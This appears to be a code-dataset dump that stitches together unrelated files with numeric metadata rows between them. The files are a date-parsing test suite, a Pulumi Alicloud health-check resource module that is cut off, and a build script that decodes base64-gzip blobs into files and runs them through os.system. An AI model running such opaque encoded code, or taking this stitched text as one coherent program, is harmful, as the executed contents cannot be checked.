39, 39, 39, 39, 39, 39, 39, 40, 40, 40, 40, 40, 40, 40, 41, 41, 41, 41, 41, 41, 41, 41]

# Tally how often each value occurs. 2000 comfortably exceeds the number of
# distinct values, so every entry is reported, ordered by descending count.
c = Counter(data)
most_frequent = c.most_common(2000)
print(most_frequent)
| 286.571429
| 1,926
| 0.485543
| 518
| 2,006
| 1.878378
| 0.096525
| 0.051387
| 0.073998
| 0.094553
| 0.924974
| 0.912641
| 0.87667
| 0.827338
| 0.790339
| 0.790339
| 0
| 0.613163
| 0.257727
| 2,006
| 6
| 1,927
| 334.333333
| 0.040296
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 0.25
| 0.25
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
123761bf53051d402d42bc59ef9b94e6f4f9567a
| 5,601
|
py
|
Python
|
hours/tests/test_parse_filter_date.py
|
SuviVappula/hauki
|
1af20d3a2e6fd7f7ca2834aaa52d3355aa658dfb
|
[
"MIT"
] | 3
|
2020-03-26T05:04:30.000Z
|
2022-03-22T15:57:18.000Z
|
hours/tests/test_parse_filter_date.py
|
SuviVappula/hauki
|
1af20d3a2e6fd7f7ca2834aaa52d3355aa658dfb
|
[
"MIT"
] | 81
|
2020-06-17T14:31:11.000Z
|
2022-02-20T19:01:54.000Z
|
hours/tests/test_parse_filter_date.py
|
SuviVappula/hauki
|
1af20d3a2e6fd7f7ca2834aaa52d3355aa658dfb
|
[
"MIT"
] | 9
|
2020-06-18T10:52:09.000Z
|
2022-02-11T13:05:59.000Z
|
import datetime
import pytest
from freezegun import freeze_time
from hours.filters import parse_maybe_relative_date_string
@pytest.mark.django_db
@pytest.mark.parametrize(
    "input_string, end_date, frozen_date, expected_date",
    (
        # Special strings
        ("today", False, "2020-11-13", datetime.date(year=2020, month=11, day=13)),
        # Dates
        ("1980-11-13", False, "2020-11-13", datetime.date(year=1980, month=11, day=13)),
        ("2020-11-13", False, "2020-11-13", datetime.date(year=2020, month=11, day=13)),
        ("2020-1-1", False, "2020-11-13", datetime.date(year=2020, month=1, day=1)),
        ("2020-12-31", False, "2020-11-13", datetime.date(year=2020, month=12, day=31)),
        ("2000-6-6", False, "2020-11-13", datetime.date(year=2000, month=6, day=6)),
        ("2050-6-6", False, "2020-11-13", datetime.date(year=2050, month=6, day=6)),
        # Spaces
        # NOTE(review): the following two pairs look identical here — the originals
        # presumably differ in whitespace character (e.g. non-breaking space); confirm.
        ("- 0d", False, "2020-11-13", datetime.date(year=2020, month=11, day=13)),
        ("+ 0d", False, "2020-11-13", datetime.date(year=2020, month=11, day=13)),
        ("- 0d", False, "2020-11-13", datetime.date(year=2020, month=11, day=13)),
        ("+ 0d", False, "2020-11-13", datetime.date(year=2020, month=11, day=13)),
        # Zero start
        ("-0d", False, "2020-11-13", datetime.date(year=2020, month=11, day=13)),
        ("+0d", False, "2020-11-13", datetime.date(year=2020, month=11, day=13)),
        ("-0w", False, "2020-11-13", datetime.date(year=2020, month=11, day=9)),
        ("+0w", False, "2020-11-13", datetime.date(year=2020, month=11, day=9)),
        ("-0m", False, "2020-11-13", datetime.date(year=2020, month=11, day=1)),
        ("+0m", False, "2020-11-13", datetime.date(year=2020, month=11, day=1)),
        ("-0y", False, "2020-11-13", datetime.date(year=2020, month=1, day=1)),
        ("+0y", False, "2020-11-13", datetime.date(year=2020, month=1, day=1)),
        # Zero end
        ("-0d", True, "2020-11-13", datetime.date(year=2020, month=11, day=13)),
        ("+0d", True, "2020-11-13", datetime.date(year=2020, month=11, day=13)),
        ("-0w", True, "2020-11-13", datetime.date(year=2020, month=11, day=15)),
        ("+0w", True, "2020-11-13", datetime.date(year=2020, month=11, day=15)),
        ("-0m", True, "2020-11-13", datetime.date(year=2020, month=11, day=30)),
        ("+0m", True, "2020-11-13", datetime.date(year=2020, month=11, day=30)),
        ("-0y", True, "2020-11-13", datetime.date(year=2020, month=12, day=31)),
        ("+0y", True, "2020-11-13", datetime.date(year=2020, month=12, day=31)),
        # One difference start
        ("+1d", False, "2020-11-13", datetime.date(year=2020, month=11, day=14)),
        ("-1d", False, "2020-11-13", datetime.date(year=2020, month=11, day=12)),
        ("+1w", False, "2020-11-13", datetime.date(year=2020, month=11, day=16)),
        ("-1w", False, "2020-11-13", datetime.date(year=2020, month=11, day=2)),
        ("+1m", False, "2020-11-13", datetime.date(year=2020, month=12, day=1)),
        ("-1m", False, "2020-11-13", datetime.date(year=2020, month=10, day=1)),
        ("+1y", False, "2020-11-13", datetime.date(year=2021, month=1, day=1)),
        ("-1y", False, "2020-11-13", datetime.date(year=2019, month=1, day=1)),
        # One difference end
        ("+1d", True, "2020-11-13", datetime.date(year=2020, month=11, day=14)),
        ("-1d", True, "2020-11-13", datetime.date(year=2020, month=11, day=12)),
        ("+1w", True, "2020-11-13", datetime.date(year=2020, month=11, day=22)),
        ("-1w", True, "2020-11-13", datetime.date(year=2020, month=11, day=8)),
        ("+1m", True, "2020-11-13", datetime.date(year=2020, month=12, day=31)),
        ("-1m", True, "2020-11-13", datetime.date(year=2020, month=10, day=31)),
        ("+1y", True, "2020-11-13", datetime.date(year=2021, month=12, day=31)),
        ("-1y", True, "2020-11-13", datetime.date(year=2019, month=12, day=31)),
        # One difference start, year boundary
        ("+1d", False, "2020-12-31", datetime.date(year=2021, month=1, day=1)),
        ("+1w", False, "2020-12-31", datetime.date(year=2021, month=1, day=4)),
        ("+1m", False, "2020-12-31", datetime.date(year=2021, month=1, day=1)),
        ("+1y", False, "2020-12-31", datetime.date(year=2021, month=1, day=1)),
        # One difference end, year boundary
        ("+1d", True, "2020-12-31", datetime.date(year=2021, month=1, day=1)),
        ("+1w", True, "2020-12-31", datetime.date(year=2021, month=1, day=10)),
        ("+1m", True, "2020-12-31", datetime.date(year=2021, month=1, day=31)),
        ("+1y", True, "2020-12-31", datetime.date(year=2021, month=12, day=31)),
        # One difference start, year boundary
        ("-1d", False, "2021-1-1", datetime.date(year=2020, month=12, day=31)),
        ("-1w", False, "2021-1-1", datetime.date(year=2020, month=12, day=21)),
        # NOTE(review): the month-backward cases below are commented out — looks like a
        # known bug around month arithmetic at the year boundary; confirm before enabling.
        # ("-1m", False, "2021-1-1", datetime.date(year=2020, month=12, day=1)),
        ("-1y", False, "2021-1-1", datetime.date(year=2020, month=1, day=1)),
        # One difference end, year boundary
        ("-1d", True, "2021-1-1", datetime.date(year=2020, month=12, day=31)),
        ("-1w", True, "2021-1-1", datetime.date(year=2020, month=12, day=27)),
        # ("-1m", True, "2021-1-1", datetime.date(year=2020, month=12, day=31)),
        ("-1y", True, "2021-1-1", datetime.date(year=2020, month=12, day=31)),
    ),
)
def test_parse_filter_date(input_string, end_date, frozen_date, expected_date):
    """Parse absolute and relative date strings with the clock frozen at ``frozen_date``
    and check the result; ``end_date`` selects end-of-period (vs start-of-period) rounding."""
    with freeze_time(frozen_date):
        assert parse_maybe_relative_date_string(input_string, end_date) == expected_date
| 63.647727
| 88
| 0.58561
| 876
| 5,601
| 3.714612
| 0.084475
| 0.217578
| 0.290104
| 0.270436
| 0.901352
| 0.876767
| 0.876152
| 0.864167
| 0.831592
| 0.781807
| 0
| 0.215395
| 0.183539
| 5,601
| 87
| 89
| 64.37931
| 0.496173
| 0.06606
| 0
| 0.085714
| 0
| 0
| 0.157754
| 0
| 0
| 0
| 0
| 0
| 0.014286
| 1
| 0.014286
| false
| 0
| 0.057143
| 0
| 0.071429
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
89f547810494fd4561502da827d9a921c5679f21
| 4,493
|
py
|
Python
|
bolt4ds/ds_template/build/script.py
|
leepand/bolt4ds
|
0b0e71deb8fc421d32e54d38a4c38a914e3aa732
|
[
"BSD-3-Clause"
] | null | null | null |
bolt4ds/ds_template/build/script.py
|
leepand/bolt4ds
|
0b0e71deb8fc421d32e54d38a4c38a914e3aa732
|
[
"BSD-3-Clause"
] | null | null | null |
bolt4ds/ds_template/build/script.py
|
leepand/bolt4ds
|
0b0e71deb8fc421d32e54d38a4c38a914e3aa732
|
[
"BSD-3-Clause"
] | null | null | null |
import gzip
import base64
import os
from pathlib import Path
from typing import Dict
# this is base64 encoded source code
file_data: Dict = {'dspipe/run.py': 'H4sIABHm3l4C/5VTy27bMBC86ysW8UUCBClWmwAt4FPT9tJbczc25NoiQpECd2nX/fqSkmIIqNHHRQ8OObszOzTD6IPAi7fyXnNzsP4MyKAfJX8WZobV4ViDIL9yDSfDEa35SUWxgU89qdcJAU0jOU1OGWJAp0F6MgHoB6koxjtgQYlcLNTNGOhk6FxOtM1zej4HNK6sqkz8eTpGmQQGr8mCZNS441zNOGWjzr/rug18J4JeZOSPbftWKRDqxKO94sb4llxrUYilDdE1vQz22lNauNXPZo1/Jfnmj8Y9oWBZ1awSc7QU9r1n2d09dE3XbZvu/l2zffhwt8Kzk7tt97itrVdo91dk9wUt0yQ7MoGPMkYprj43qFQMqC5ltVocrZf9PB50iriczqse3ZFgxIADCYVpEIFS3zXw/1iD+jSR/N0f7fdplGPwqQlepFS3ur+1ETbzOGfNYHjVOo+kzMGorGuSAHM6DxlUKROLWn5L6fyy5qW4fiWB1qMuU4Cr31cnKZNvjBe4+Lgwasjy0qDzjOtUnEkArZ2vwJK4nL2U6tXOq03GnZJ2nZzca392LMnmYWXcsj+lB26l/x9uyJ8D+ws98yvB1QMAAA==', 'dspipe/cfg.py': 'H4sIABHm3l4C/22NMQrDMAxFd59C0MEOBJNkyFDILboHY4ticGIjKdDcvnZDO1WT9Ph6P+S1EBbKHplhgQcdqFTcSiaB4AQlbqiCrCyukuXHbFvMNExDP/dj1yK4h/+BcWoJdYOUXYBaJugFA3jCgLtEl1gJnXcFdb7ds5RY8IMOik18EXtITGyb6nRbMto2Ddt26M4+UYyuD7pT+PJY5LIWx/wGshwvjOwAAAA=', 'dspipe/tasks.py': 'H4sIABHm3l4C/7VVy27bMBC86ysI+CAJsOU0CIrAgIqiLdL2ZrS9BYbBiCubDUUqJJUgKPrv3aWedpO06cPwQSJ3hzPL2dVMVrWxnomXvlTmLuper4zyZ8JltMa4e2o789xdu35HNXIn+xd3rYBbPe8fMsExGLyLSmuqYRW0g+pKAevSPnEtTHVhLDj/VnHnZCnB9qA17iIj/NciivrVotxF0YwJKKUGdmfsdeBbUDr7ggzfg3+HpyedkpZ1Rjvrm3WATFeMzZjjt8CIZ2l5BeEYbm8a8KgCgO29r91quexhLHDh9yBM4TJplqCXinvkvfTc7lBptveVihj+hN86XPQsb4uUIR1YczrFg02QOW+Uz1FI1oemyKeXQjTaUJexz89hwsVtyD2gAlr8HhEMTEOSKxC8UWC3e+NGFWNiiArwHUKsTMEVRcfzyaYrrKy9NDqPP+CepjKbklW82NPd2UZrqXfMQmU8jMdOMAqjS7nb1tzvcyELnzgoWsACTRPPGWHmccdjMUAsApf0WE8wUK/no/ZPSDo/OT99RMuaUFDHMW/Ga8lqawpw7l9oILakIep4UcEwWZXpagCXVjpUdNx2mTJcbGkzSUcR5dZbLjXG14K8wC9IfkJhIXNeGNVU2uWXcQncNxa+fY+z0tiK+0SmDJ+YZAhgud5BcpZufga/jO/jDZ4QQNvWGGJmzIQScrUa48dEpADx5lVOEofO2AzZYZmaNulTqGtuGllcq/ujbo6i12O3YAgOmGQyGyixGyACajQ+6OL+mc3WjpXQaePsWVvoDPDk+Glv1GzrIXxw5Rtj1CMtOo0nBcOcCBcz7lFP3YNbavOkdSZ2CKWVum58kgbrJNPS0gLryihCjZ89IftSzQhrEU5aENDo47IlcSBy5Drlm0mcNper+WrxYjOx/oH+zOE8Go0yTUl/YahgJGLMTOOR559rJaRFC9KKfcSU64Nb/S++/ELqHrIk3TDg97DT3bIN38Kw8xcGGsIqI0BhzMMf+0Rvv5orl5/OaapgALW9h/zkCCArpX/wPueHo+eh6w0A6Q+tM9zBAQkAAA=
=', 'dspipe/__init__.py': 'H4sIABHm3l4C/wMAAAAAAAAAAAA=', 'dspipe/visualize.py': 'H4sIABHm3l4C/62SwWrEIBCG73mK3KKQTul1IdeeC93bsoRZnQRZo+KYpfv2Nclm27QLvVREnNFv/H/VDMHHVPLZEkZXmCVMyGdeg4BOI5e5B12sSdX1RaGpK1GpMaK6Cu3bEClEr4i5yeuwychdUeY2eE22bJYTYJ/HfUTjftBbEvyYwpiEBOtRCzkX0l2bJnJT6+0OicdUiMYlcXMLA6VoFMPqoWXlI4m19KG6Vsd6VgxZjjYq3dfAWK8Ou3r39HKUUi53EaxP7XJB6LIK8Yfp/3SWqa+TMxo0vFM0WcRioCNMY6Tv8tq6NE7TR/PIFChvx8HxUv326gOmyaM1JwjXaTb/Cpt+KwDOk/aCdswKkBU5bVzfvKJlkjChcMK4vopNwHihzvSiykYzys/znuD6Sn4ClRfcn6QCAAA=', 'dspipe/export.py': 'H4sIABHm3l4C/5VRPW/bMBDd9SsO8GAZMKgl6BDAW5uMHRogY8CIJ4sIxRPIYxz/+95RktumXapB0n29e+/dDn6MNvl4hmdKb0OgSwYbHXwvPBfOzQ4yIozMc77vOveFtcUktI5HdNRn46nD2AXLmLnrKQT7SkkiM/IUGj/NlBheKfCdy0anwWZYgf5VNrOfMTdbiW1+k2gHtjBBtu+4DYOzbEGSEusMJJyp6YfzS41OsNdvtBPul2yiwYdacDjYEnjfbILqTuOj53YDOK79p99mjxCot6HWT0+p4AF2cBHjwMelBBM5hMGnzEoaP7AvLAkVq1Jke1VknuT9iPxVNLSHG49UYqt1xaV6gqp7suwFPFyrAU63VY3OJ+yZ0vVm0BkjqvugdDMMlBabeoq5TJjUL1nySfiD/H77UL/r9uPmwcFseMJRVlxGjHClAjap3dZdFW8ueVzZHnVRFE51D04kTBSocfRS207wYEPGxg+wpu4bkOe/D5EwIy83qADrzf/EOSNXiHbp2dUuM5cgJ0z47vHyd6X9hWeU36fOW749/AQCGRaFPAMAAA==', 'setup.py': 'H4sIABHm3l4C/0srys9VKE4tKS0oyc/PKVbIzC3ILyqBiOgopGXmpcQXJCZnJ6anFnNxgUU1uBSAIC8xN9VWPaW4ILMgVV0HLFSWWlScmZ9nq26gZwgVgmm1RTFIQ1OHSxMAGQWxpHkAAAA=', 'dspipe/README.md': 'H4sIABHm3l4C/41SwY7UMAy95yss7QGQmPbCaW8IiRNISMsFIbTjpm6bndSJEoeZ8vU4me4CKw57apo8Pz+/5xsYgpd3Y+4mH85wgC8pPJAV+Epr9CiUzc0NfPCEDMgjZIseB08Qd1yWVKyURDCFBCMKKsYR2ydINuaJDM5OFrBhXQPDSNnNDBFFKHFuBItIzLd9PyuuDJ0ie08UtXW/C+2rUFNV3T22NuYomE9d3I63cA7p1GapVxnAHO00X58iJlxJm7VRgix6soEnN1dYKnyF0YVsEfoP00+XC3r3i67AkglCkVjkKn4qqXEio9+ye1bi4sbDsyrH8FDiViVxEBpCONWizibSSDZcvRaEKC4oJUxOjW8OqrWi1tIIFUksDn1j+15rqpgV5cfrRzfHYHOHnJ0m1zzdz30LRfpEE6Wa2T3GSDw6S7n/9v7zp7uNBS/dIqt/87ZKbNm52lgCaEj1s4v5RwqYP3szJGS7GPNRLUoUCUU9wJlgCwXGwK8EmJQRvQdZgtpTmyhTbjlZpaieqbVg/yLslD4w6dSqQW/p4rI4nnV6P6qhJdefYxVpG/Aw7PWHQ33ydLgSvWTpxnwv+xJ3lbE7mt9ZbPhCOwMAAA==', 'dspipe/reports/README.md': 'H4sIABHm3l4C/1NWVihKLcgvKilW0C3IS9fT0wMADNJGVRIAAAA='}
# Materialize each embedded file: announce it, ensure its directory exists,
# then decode and decompress the payload onto disk.
for target, blob in file_data.items():
    print(target)
    dest = Path(target)
    dest.parent.mkdir(exist_ok=True)
    dest.write_bytes(gzip.decompress(base64.b64decode(blob)))
def run(command):
    """Run *command* in a shell with /dspipe/working prepended to PYTHONPATH.

    Returns the raw status from os.system (0 on success; on POSIX a wait
    status encoding the shell's exit code) instead of discarding it, so
    callers can detect failures.

    NOTE(review): *command* is interpolated into the shell string unescaped —
    only pass trusted, hard-coded commands here.
    """
    return os.system('export PYTHONPATH=${PYTHONPATH}:/dspipe/working && ' + command)
# Install the just-extracted package in development mode, then execute the pipeline entry point.
run('python setup.py develop --install-dir /dspipe/working')
run('python dspipe/run.py')
| 179.72
| 3,996
| 0.920766
| 217
| 4,493
| 19.02765
| 0.728111
| 0.023735
| 0.008719
| 0.00775
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.131226
| 0.021367
| 4,493
| 24
| 3,997
| 187.208333
| 0.807824
| 0.007567
| 0
| 0
| 0
| 0.333333
| 0.904196
| 0.858874
| 0
| 1
| 0
| 0
| 0
| 1
| 0.066667
| false
| 0
| 0.333333
| 0
| 0.4
| 0.066667
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
c3a91d04243263af5f3542025c55fcf9076522af
| 25,875
|
py
|
Python
|
sdk/python/pulumi_alicloud/cen/vbr_health_check.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 42
|
2019-03-18T06:34:37.000Z
|
2022-03-24T07:08:57.000Z
|
sdk/python/pulumi_alicloud/cen/vbr_health_check.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 152
|
2019-04-15T21:03:44.000Z
|
2022-03-29T18:00:57.000Z
|
sdk/python/pulumi_alicloud/cen/vbr_health_check.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 3
|
2020-08-26T17:30:07.000Z
|
2021-07-05T01:37:45.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['VbrHealthCheckArgs', 'VbrHealthCheck']
@pulumi.input_type
class VbrHealthCheckArgs:
    """Input argument bundle for creating a VbrHealthCheck resource.

    Generated by the Pulumi Terraform Bridge (tfgen); each field is exposed both
    as a constructor keyword and as a camelCase-named getter/setter property.
    """
    def __init__(__self__, *,
                 cen_id: pulumi.Input[str],
                 health_check_target_ip: pulumi.Input[str],
                 vbr_instance_id: pulumi.Input[str],
                 vbr_instance_region_id: pulumi.Input[str],
                 health_check_interval: Optional[pulumi.Input[int]] = None,
                 health_check_source_ip: Optional[pulumi.Input[str]] = None,
                 healthy_threshold: Optional[pulumi.Input[int]] = None,
                 vbr_instance_owner_id: Optional[pulumi.Input[int]] = None):
        """
        The set of arguments for constructing a VbrHealthCheck resource.
        :param pulumi.Input[str] cen_id: The ID of the CEN instance.
        :param pulumi.Input[str] health_check_target_ip: The destination IP address of health checks.
        :param pulumi.Input[str] vbr_instance_id: The ID of the VBR.
        :param pulumi.Input[str] vbr_instance_region_id: The ID of the region to which the VBR belongs.
        :param pulumi.Input[int] health_check_interval: Specifies the interval at which the health check sends continuous detection packets. Default value: 2. Value range: 2 to 3.
        :param pulumi.Input[str] health_check_source_ip: The source IP address of health checks.
        :param pulumi.Input[int] healthy_threshold: Specifies the number of probe messages sent by the health check. Default value: 8. Value range: 3 to 8.
        :param pulumi.Input[int] vbr_instance_owner_id: The ID of the account to which the VBR belongs.
        """
        pulumi.set(__self__, "cen_id", cen_id)
        pulumi.set(__self__, "health_check_target_ip", health_check_target_ip)
        pulumi.set(__self__, "vbr_instance_id", vbr_instance_id)
        pulumi.set(__self__, "vbr_instance_region_id", vbr_instance_region_id)
        # Optional arguments are only recorded when supplied, so the provider defaults apply otherwise.
        if health_check_interval is not None:
            pulumi.set(__self__, "health_check_interval", health_check_interval)
        if health_check_source_ip is not None:
            pulumi.set(__self__, "health_check_source_ip", health_check_source_ip)
        if healthy_threshold is not None:
            pulumi.set(__self__, "healthy_threshold", healthy_threshold)
        if vbr_instance_owner_id is not None:
            pulumi.set(__self__, "vbr_instance_owner_id", vbr_instance_owner_id)

    @property
    @pulumi.getter(name="cenId")
    def cen_id(self) -> pulumi.Input[str]:
        """
        The ID of the CEN instance.
        """
        return pulumi.get(self, "cen_id")

    @cen_id.setter
    def cen_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "cen_id", value)

    @property
    @pulumi.getter(name="healthCheckTargetIp")
    def health_check_target_ip(self) -> pulumi.Input[str]:
        """
        The destination IP address of health checks.
        """
        return pulumi.get(self, "health_check_target_ip")

    @health_check_target_ip.setter
    def health_check_target_ip(self, value: pulumi.Input[str]):
        pulumi.set(self, "health_check_target_ip", value)

    @property
    @pulumi.getter(name="vbrInstanceId")
    def vbr_instance_id(self) -> pulumi.Input[str]:
        """
        The ID of the VBR.
        """
        return pulumi.get(self, "vbr_instance_id")

    @vbr_instance_id.setter
    def vbr_instance_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "vbr_instance_id", value)

    @property
    @pulumi.getter(name="vbrInstanceRegionId")
    def vbr_instance_region_id(self) -> pulumi.Input[str]:
        """
        The ID of the region to which the VBR belongs.
        """
        return pulumi.get(self, "vbr_instance_region_id")

    @vbr_instance_region_id.setter
    def vbr_instance_region_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "vbr_instance_region_id", value)

    @property
    @pulumi.getter(name="healthCheckInterval")
    def health_check_interval(self) -> Optional[pulumi.Input[int]]:
        """
        Specifies the interval at which the health check sends continuous detection packets. Default value: 2. Value range: 2 to 3.
        """
        return pulumi.get(self, "health_check_interval")

    @health_check_interval.setter
    def health_check_interval(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "health_check_interval", value)

    @property
    @pulumi.getter(name="healthCheckSourceIp")
    def health_check_source_ip(self) -> Optional[pulumi.Input[str]]:
        """
        The source IP address of health checks.
        """
        return pulumi.get(self, "health_check_source_ip")

    @health_check_source_ip.setter
    def health_check_source_ip(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "health_check_source_ip", value)

    @property
    @pulumi.getter(name="healthyThreshold")
    def healthy_threshold(self) -> Optional[pulumi.Input[int]]:
        """
        Specifies the number of probe messages sent by the health check. Default value: 8. Value range: 3 to 8.
        """
        return pulumi.get(self, "healthy_threshold")

    @healthy_threshold.setter
    def healthy_threshold(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "healthy_threshold", value)

    @property
    @pulumi.getter(name="vbrInstanceOwnerId")
    def vbr_instance_owner_id(self) -> Optional[pulumi.Input[int]]:
        """
        The ID of the account to which the VBR belongs.
        """
        return pulumi.get(self, "vbr_instance_owner_id")

    @vbr_instance_owner_id.setter
    def vbr_instance_owner_id(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "vbr_instance_owner_id", value)
@pulumi.input_type
class _VbrHealthCheckState:
    """State bundle for looking up and filtering existing VbrHealthCheck resources.

    Generated by the Pulumi Terraform Bridge (tfgen); mirrors VbrHealthCheckArgs
    but with every field optional, since partial state is valid for lookups.
    """
    def __init__(__self__, *,
                 cen_id: Optional[pulumi.Input[str]] = None,
                 health_check_interval: Optional[pulumi.Input[int]] = None,
                 health_check_source_ip: Optional[pulumi.Input[str]] = None,
                 health_check_target_ip: Optional[pulumi.Input[str]] = None,
                 healthy_threshold: Optional[pulumi.Input[int]] = None,
                 vbr_instance_id: Optional[pulumi.Input[str]] = None,
                 vbr_instance_owner_id: Optional[pulumi.Input[int]] = None,
                 vbr_instance_region_id: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering VbrHealthCheck resources.
        :param pulumi.Input[str] cen_id: The ID of the CEN instance.
        :param pulumi.Input[int] health_check_interval: Specifies the interval at which the health check sends continuous detection packets. Default value: 2. Value range: 2 to 3.
        :param pulumi.Input[str] health_check_source_ip: The source IP address of health checks.
        :param pulumi.Input[str] health_check_target_ip: The destination IP address of health checks.
        :param pulumi.Input[int] healthy_threshold: Specifies the number of probe messages sent by the health check. Default value: 8. Value range: 3 to 8.
        :param pulumi.Input[str] vbr_instance_id: The ID of the VBR.
        :param pulumi.Input[int] vbr_instance_owner_id: The ID of the account to which the VBR belongs.
        :param pulumi.Input[str] vbr_instance_region_id: The ID of the region to which the VBR belongs.
        """
        # Only record fields that were actually supplied.
        if cen_id is not None:
            pulumi.set(__self__, "cen_id", cen_id)
        if health_check_interval is not None:
            pulumi.set(__self__, "health_check_interval", health_check_interval)
        if health_check_source_ip is not None:
            pulumi.set(__self__, "health_check_source_ip", health_check_source_ip)
        if health_check_target_ip is not None:
            pulumi.set(__self__, "health_check_target_ip", health_check_target_ip)
        if healthy_threshold is not None:
            pulumi.set(__self__, "healthy_threshold", healthy_threshold)
        if vbr_instance_id is not None:
            pulumi.set(__self__, "vbr_instance_id", vbr_instance_id)
        if vbr_instance_owner_id is not None:
            pulumi.set(__self__, "vbr_instance_owner_id", vbr_instance_owner_id)
        if vbr_instance_region_id is not None:
            pulumi.set(__self__, "vbr_instance_region_id", vbr_instance_region_id)

    @property
    @pulumi.getter(name="cenId")
    def cen_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the CEN instance.
        """
        return pulumi.get(self, "cen_id")

    @cen_id.setter
    def cen_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "cen_id", value)

    @property
    @pulumi.getter(name="healthCheckInterval")
    def health_check_interval(self) -> Optional[pulumi.Input[int]]:
        """
        Specifies the interval at which the health check sends continuous detection packets. Default value: 2. Value range: 2 to 3.
        """
        return pulumi.get(self, "health_check_interval")

    @health_check_interval.setter
    def health_check_interval(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "health_check_interval", value)

    @property
    @pulumi.getter(name="healthCheckSourceIp")
    def health_check_source_ip(self) -> Optional[pulumi.Input[str]]:
        """
        The source IP address of health checks.
        """
        return pulumi.get(self, "health_check_source_ip")

    @health_check_source_ip.setter
    def health_check_source_ip(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "health_check_source_ip", value)

    @property
    @pulumi.getter(name="healthCheckTargetIp")
    def health_check_target_ip(self) -> Optional[pulumi.Input[str]]:
        """
        The destination IP address of health checks.
        """
        return pulumi.get(self, "health_check_target_ip")

    @health_check_target_ip.setter
    def health_check_target_ip(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "health_check_target_ip", value)

    @property
    @pulumi.getter(name="healthyThreshold")
    def healthy_threshold(self) -> Optional[pulumi.Input[int]]:
        """
        Specifies the number of probe messages sent by the health check. Default value: 8. Value range: 3 to 8.
        """
        return pulumi.get(self, "healthy_threshold")

    @healthy_threshold.setter
    def healthy_threshold(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "healthy_threshold", value)

    @property
    @pulumi.getter(name="vbrInstanceId")
    def vbr_instance_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the VBR.
        """
        return pulumi.get(self, "vbr_instance_id")

    @vbr_instance_id.setter
    def vbr_instance_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "vbr_instance_id", value)

    @property
    @pulumi.getter(name="vbrInstanceOwnerId")
    def vbr_instance_owner_id(self) -> Optional[pulumi.Input[int]]:
        """
        The ID of the account to which the VBR belongs.
        """
        return pulumi.get(self, "vbr_instance_owner_id")

    @vbr_instance_owner_id.setter
    def vbr_instance_owner_id(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "vbr_instance_owner_id", value)

    @property
    @pulumi.getter(name="vbrInstanceRegionId")
    def vbr_instance_region_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the region to which the VBR belongs.
        """
        return pulumi.get(self, "vbr_instance_region_id")

    @vbr_instance_region_id.setter
    def vbr_instance_region_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "vbr_instance_region_id", value)
class VbrHealthCheck(pulumi.CustomResource):
    # Generated Pulumi resource wrapper for the Alicloud CEN VBR health-check
    # resource type 'alicloud:cen/vbrHealthCheck:VbrHealthCheck'.

    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 cen_id: Optional[pulumi.Input[str]] = None,
                 health_check_interval: Optional[pulumi.Input[int]] = None,
                 health_check_source_ip: Optional[pulumi.Input[str]] = None,
                 health_check_target_ip: Optional[pulumi.Input[str]] = None,
                 healthy_threshold: Optional[pulumi.Input[int]] = None,
                 vbr_instance_id: Optional[pulumi.Input[str]] = None,
                 vbr_instance_owner_id: Optional[pulumi.Input[int]] = None,
                 vbr_instance_region_id: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        This topic describes how to configure the health check feature for a Cloud Enterprise Network (CEN) instance.
        After you attach a Virtual Border Router (VBR) to the CEN instance and configure the health check feature, you can monitor the network conditions of the on-premises data center connected to the VBR.

